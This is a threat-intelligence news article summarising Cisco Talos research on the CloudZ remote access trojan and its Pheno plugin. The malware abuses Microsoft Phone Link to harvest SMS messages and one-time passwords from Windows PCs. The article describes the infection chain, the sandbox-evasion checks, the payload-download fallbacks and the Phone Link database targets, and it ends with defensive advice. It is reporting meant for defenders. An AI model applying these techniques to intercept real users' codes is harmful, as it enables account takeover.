Researchers at Cisco Talos have detailed an ongoing intrusion, active since at least January 2026, in which an unidentified threat actor is deploying a modular .NET-based RAT called CloudZ, paired with a previously undocumented plugin known as Pheno. Together, the two abuse Microsoft's Phone Link application to siphon off SMS messages, one-time passwords (OTPs), and authenticator app notifications directly from compromised Windows machines.

The campaign has been independently covered by The Hacker News, BleepingComputer, Infosecurity Magazine, and CSO Online, among others.

Why this attack matters

Microsoft Phone Link (formerly Your Phone) is a legitimate Windows 10/11 sync utility that bridges a PC to an Android or iOS device over Wi-Fi and Bluetooth. Once paired, it mirrors text messages, notifications, and calls onto the desktop and stores synchronized data locally in SQLite databases such as PhoneExperiences-*.db.

That convenience is exactly what the attackers exploit. Rather than breaching the phone itself (a much harder problem), CloudZ targets the PC-side artifacts of an already-trusted bridge. As Talos researchers Alex Karkins and Chetan Raghuprasad put it in their analysis, the goal was stealing victims' credentials and potentially OTPs, without ever deploying malware on the phone.

The implication is significant for enterprise defenders: controls focused on mobile device security can be sidestepped entirely if the linked Windows endpoint is compromised. SMS-based and even some app-based MFA flows that rely on push notifications become exposed the moment the desktop is.

The infection chain

According to Talos and corroborating reporting from BleepingComputer, the attack unfolds in several stages:

1. Initial access (unknown vector). Talos has not yet determined how victims are first compromised, but the foothold leads to execution of a fake ConnectWise ScreenConnect update, typically named systemupdates.exe.
2. Rust-compiled dropper. This binary establishes persistence by spawning a hidden PowerShell script that creates a scheduled task (named SystemWindowsApis) to run on system startup.
3. .NET intermediate loader. Disguised as a text file in a system directory, the loader executes via the legitimate Windows binary regasm.exe under the SYSTEM account. It also performs heavy anti-analysis checks: timing-based sandbox evasion, enumeration of analysis tools (Wireshark, Fiddler, Procmon, Sysmon), and searches for VM/sandbox indicators in the system path and hostname, as documented by Infosecurity Magazine.
4. CloudZ RAT deployment. Compiled in mid-January 2026 and obfuscated with ConfuserEx, CloudZ decrypts an embedded configuration, opens an encrypted TCP socket to its C2 server, and enters command dispatcher mode. It pulls additional configuration from attacker-controlled Cloudflare Workers domains and from Pastebin pages tagged with the handler HELLOHIALL, while rotating through three hardcoded user-agent strings and anti-caching headers to blend HTTP traffic with normal browser activity.

What CloudZ can do

Beyond Phone Link abuse, CloudZ is a fairly capable modular RAT. According to Talos and BleepingComputer, it supports browser data theft, host system profiling, file management (delete, download, write), and arbitrary command execution. It downloads its plugins using a three-method fallback (first attempting curl, then PowerShell's Invoke-WebRequest, and finally falling back to the bitsadmin LOLBin) to maximize the chance a payload lands successfully.

The Pheno plugin

Pheno is the part of the toolkit that turns a generic RAT infection into an OTP-interception capability. Per the Talos report, the plugin scans every running process for keywords associated with Phone Link (YourPhone, PhoneExperienceHost, and Link to Windows) and writes the results to a staging folder.

It then performs a secondary check: it reads back its own output files looking for the case-insensitive keyword proxy. Phone Link uses a local proxy connection to relay traffic between the PC and the paired phone, so the presence of "proxy" in a previous run's output indicates an active session. When found, Pheno writes Maybe connected to its output file. CloudZ then reads that staging data and exfiltrates it to the C2 server.

With a confirmed Phone Link connection, the operator can then go after the SQLite database file (PhoneExperiences-*.db) where Phone Link locally caches synchronized SMS and notifications, and that's where authenticator app notifications and SMS-delivered OTPs live, as CyberInsider notes in its writeup.

Defensive recommendations

The advice from Talos and the wider reporting is consistent:

• Move off SMS-based MFA. It was already the weakest factor, and CloudZ is another reason to retire it. As BleepingComputer recommends, prefer phishing-resistant options like FIDO2 hardware keys, or authenticator apps that don't push codes to a paired desktop.
• Audit Phone Link usage. CyberInsider suggests reviewing whether Phone Link is actually needed in your environment, and disabling it if not.
• Hunt for the IOCs below. Talos has published ClamAV signatures, Snort rules, and IOCs on GitHub.
• Watch for suspicious scheduled tasks created under SYSTEM that invoke regasm.exe against unusual file paths, and for systemupdates.exe masquerading as ScreenConnect.

Talos has not attributed the campaign to any known threat actor.